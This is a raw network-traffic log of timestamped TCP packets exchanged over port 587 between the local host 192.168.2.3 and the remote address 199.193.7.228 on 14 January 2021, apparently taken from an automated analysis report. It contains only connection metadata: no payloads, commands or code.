Jan 14, 2021 08:01:19.289627075 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.387691975 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.387718916 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.389406919 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.389957905 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.390549898 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.482321024 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.482630014 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.483215094 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.483414888 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.483581066 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.483763933 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.483942986 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.484081030 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.484209061 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.484350920 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.582348108 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.582366943 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.582988024 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.673327923 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.673444033 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.673456907 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.673716068 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.673962116 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.673973083 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.674076080 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.674242020 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.683478117 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.734541893 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.773253918 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.777641058 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.778291941 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.836061954 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:19.968585014 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.971079111 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:19.971868038 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.026607037 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.027121067 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.027149916 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.027251005 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.027961016 CET	49795	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.162230015 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.196126938 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.207278967 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.218312979 CET	587	49795	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.398065090 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.398545980 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.399219036 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.399327040 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.399497986 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.399597883 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.399765968 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.399898052 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.400022984 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.589529991 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.589632034 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.589703083 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.589709044 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.589821100 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.590249062 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.590320110 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.590353012 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.590379953 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.591120005 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.780215979 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.780405998 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.780721903 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.780854940 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.781354904 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.781491041 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.900908947 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.970936060 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.971071959 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.971143961 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.971230030 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.971313000 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.971430063 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.971473932 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.971549988 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:20.971854925 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:20.971965075 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.091582060 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.091703892 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.149430990 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.150276899 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.161767006 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.161806107 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.161832094 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.161858082 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.161868095 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.161881924 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.161907911 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.161916018 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.161945105 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162013054 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162123919 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162239075 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162270069 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.162306070 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.162342072 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162435055 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162533045 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162642002 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162746906 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162846088 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.162950993 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.163048983 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.163146973 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.163245916 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.163346052 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.163428068 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.163516998 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.284363985 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.284882069 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.340233088 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.340984106 CET	587	49793	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.341006041 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.341078997 CET	49793	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.341234922 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.352430105 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.352467060 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.352483988 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.352596045 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.352725983 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.352858067 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.352876902 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.352952957 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353032112 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353153944 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353276014 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353296041 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353364944 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353439093 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353457928 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353565931 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353682041 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353702068 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.353789091 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.382021904 CET	587	49797	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.437933922 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.474925041 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.480458021 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.481062889 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.532888889 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.533421040 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.671130896 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.672353029 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.723731041 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.724421978 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.724963903 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.862524986 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.862651110 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.862704992 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.862873077 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.865545034 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.867064953 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:21.915255070 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:21.916167974 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.055567026 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.055600882 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.057018995 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.057487011 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.058300018 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.106592894 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.106630087 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.106648922 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.109558105 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.111963034 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.112881899 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.248451948 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.250319958 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.251315117 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.302378893 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.302429914 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.303101063 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.303396940 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.304337025 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.441450119 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.444528103 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.445086956 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.494623899 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.495796919 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.496373892 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.635003090 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.635678053 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.636457920 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.686650991 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.689457893 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.690186977 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.826385021 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.853344917 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.853735924 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:22.880570889 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.884310007 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:22.884713888 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.043786049 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.044393063 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.045347929 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.045691013 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.046089888 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.046416044 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.075082064 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.105341911 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.106029987 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.235358000 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.235531092 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.235975027 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.236248970 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.296380997 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.296982050 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.317408085 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.334716082 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.345736980 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.363333941 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.375569105 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.375796080 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.403701067 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.507778883 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.507878065 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.525157928 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.536077976 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.553642035 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.554147005 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.565968037 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.566076994 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.566179037 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.594067097 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.594485044 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.594636917 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.698658943 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.698757887 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.698782921 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.744474888 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.744585991 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.744616985 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.756550074 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.756727934 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.785069942 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.785095930 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.785196066 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.879547119 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.889173031 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.889202118 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.889259100 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.889297962 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.889440060 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.934945107 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.934973955 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.935092926 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.947089911 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.947120905 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.947135925 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.947242022 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.947298050 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.947407007 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:23.975577116 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:23.975704908 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.069739103 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.069911957 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.079735041 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.079766989 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.079782963 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.079920053 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.101516008 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.125478983 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.125504017 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.125607967 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.137671947 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.137697935 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.137707949 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.137841940 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.138163090 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.138206959 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.138216019 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.138242960 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.138333082 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.138402939 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.138477087 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.166541100 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.169111967 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.169250011 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.260008097 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.260039091 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.260082960 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.260124922 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.270320892 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.270351887 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.292140961 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.316023111 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.316051960 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.328650951 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.328679085 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.328689098 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.328855991 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.328871965 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.328886032 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.329000950 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.350286961 CET	587	49799	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.359327078 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.359586954 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.391105890 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.450232983 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.450273991 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.450285912 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.450453043 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.549756050 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.549791098 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.549890995 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.640553951 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.640667915 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.640686989 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.640716076 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.640746117 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.640775919 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.640777111 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.640832901 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.640914917 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.640940905 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.640989065 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.641024113 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.730091095 CET	49799	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.730706930 CET	49797	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.740206957 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.740281105 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.740333080 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.740358114 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.740394115 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.831201077 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.831340075 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.831623077 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.831640005 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.831666946 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.831715107 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.831737995 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.831870079 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.831883907 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.831967115 CET	49798	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:24.832201004 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.832395077 CET	587	49798	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:24.832473993 CET	587	49798	199.193.7.228	192.168.2.3
